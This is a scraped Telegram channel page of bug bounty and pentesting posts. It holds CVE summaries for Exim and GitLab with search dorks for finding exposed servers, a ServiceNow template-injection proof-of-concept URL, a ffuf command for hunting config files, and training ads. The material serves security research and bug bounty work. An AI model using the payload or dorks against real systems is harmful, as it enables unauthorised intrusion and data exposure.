Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
πŸ› οΈGuide to Active Directory Hacking

πŸ“Active Directory (AD) is a directory service developed by Microsoft to manage and store network information, offering a central location for access control and network security.

πŸ“° Read more: https://en.iguru.gr/odigos-gia-active-directory-hacking/

πŸ”–#infosec #cybersecurity #hacking #pentesting #security
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ‘¨β€πŸ’»6πŸ‘3🀑2πŸ’―1
CVE-2024-39929: Bypass of attachment verification in Exim❗

Due to incorrect parsing of a multiline RFC 2231 header filename, an attacker can bypass attachment verification and send an executable payload to the victim.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/gRdtH
πŸ‘‰ Dork: smtp.banner:"Exim" NOT smtp.banner:"Exim 4.98"

Read more: https://bugs.exim.org/show_bug.cgi?id=3099#c4
πŸ‘3
Brut Security pinned Β«πŸ“£Understanding Bug Bounty Hunting for NewcomersπŸ“£ 🎁Bug bounty hunting can seem appealing, but it’s important to know: πŸ–±High Skill Level Required: Success in bug bounty hunting demands a very high skill level. It's not just about using tools like Nuclei to…»
⚠️Template Injection on ServiceNow by @assetnote⚠️

πŸ“ŒPoC:
http://1337/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>


😬 https://assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data

πŸ”–#bugbounty #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❀1πŸ‘1
πŸ’₯Last Week to Enroll for July Batch
▢️https://wa.link/7j7p6g
Please open Telegram to view this post
VIEW IN TELEGRAM
🀣🀣 Brother doing hardcore to get a bounty
🐳5πŸ”₯2❀1
πŸ’ƒ New Bug Bounty Target - https://tovawald.com/.well-known/security.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯2
β˜„οΈSensitive Information Disclosure Through Config Fileβ˜„οΈ

⚠️Steps To Reproduce:
ffuf -c -ac -r -u https://target[.]com/FUZZ -w wordlist.txt


⚠️Wordlists:
πŸ”—https://github.com/six2dez/OneListForAll
πŸ”—https://wordlists.assetnote.io/
πŸ”—https://github.com/danielmiessler/SecLists
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯5
πŸ”₯2
CVE-2024-6385: Improper Access Control in GitLab, 9.6 rating πŸ”₯

The new vulnerability allows an attacker to run pipeline jobs with the rights of any other user.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/HvsUY
πŸ‘‰ Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef

Read more: https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-bug-that-lets-attackers-run-pipelines-as-an-arbitrary-user/
IDOR.pdf
78.5 KB
πŸ‘1